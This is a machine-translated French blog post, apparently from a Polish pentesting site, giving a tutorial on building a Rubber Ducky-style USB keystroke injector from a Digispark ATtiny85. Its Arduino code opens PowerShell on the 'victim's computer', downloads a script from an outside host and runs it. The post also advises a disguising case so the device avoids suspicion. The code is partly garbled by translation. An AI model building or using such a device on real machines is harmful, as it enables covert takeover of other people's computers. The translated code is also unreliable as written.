Une « clé USB » programmable, c’est-à-dire comment prendre rapidement en charge un ordinateur

de | |

Aujourd’hui, l’entrée est une forme de tutoriel sur la façon de créer votre propre clé USB programmable sur le modèle de la chère et populaire Rubber Ducky de Hak5. Il fonctionnera sur une base de clavier – connecté à un ordinateur tape une séquence de touches préprogrammées. La première étape consiste à acheter une tuile Arduino miniature basée sur le microcontrôleur ATtiny85 – Digispark. Le moins cher peut être trouvé chez nos amis chinois sur l’un des sites d’enchères populaires. Les prix commencent à partir de 1 $ –Digispark ATtiny85 - Digispark Comme je rencontre parfois un problème avec la détection DigiSparka par certains ordinateurs (en particulier les ports USB3), il est préférable de stocker l’adaptateur immédiatement, qui résout ce problème (coût d’environ 2 $) –Adaptateur adaptateur USB Lorsque le matériel commandé arrive, nous avons besoin de son environnement de programmation qui sera Adruino IDE –Arduino Tutorial connexion à elle Digisparka nous pouvons trouver ici –Schéma Notre contrôleur a une quantité limitée de mémoire, de sorte que la charge de paiement appropriée peut ne pas tenir sur elle. J’ai contourné ce problème en plaçant le code de téléchargement sur elle à l’aide d’un script powershell avec payload, qui à son tour sera ensuite exécuté sur l’ordinateur de la victime:

#include « DigiKeyboard.h » vide configuration ()

void loop() { DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(500); DigiKeyboard.print(« powershell »); DigiKeyboard.sendKeyStro KEY_ENTER digiKeyboard.delay(1000); DigiKeyboard.print(« $client = new-object System.Net.WebClient »); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(500); DigiKeyboard.print(« $client. DownloadFile (« https://my127001.pl/script.ps1" ») DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT | KEY_R); DigiKeyboard.delay(750); DigiKeyboard.print(« powershell.exe -File script.ps1 »); DigiKeyboard.sendKeyStroke(KEY_ENTER); for (;) {**empty*

}

Pour donner plus de fioritures à l’apparence de notre pendriva, de sorte qu’il ne soulève pas de soupçons, il vaut la peine de faire le plein d’un boîtier imprimé par exemple avec le projet sous le lien –Le boîtier tout se présente comme suit et peut prendre le contrôle de l’ordinateur de la victime en quelques secondes: « pendrive » programmable

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!).
Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Pour marque-pages : Permaliens.

Podziel się swoją opinią na temat artykułu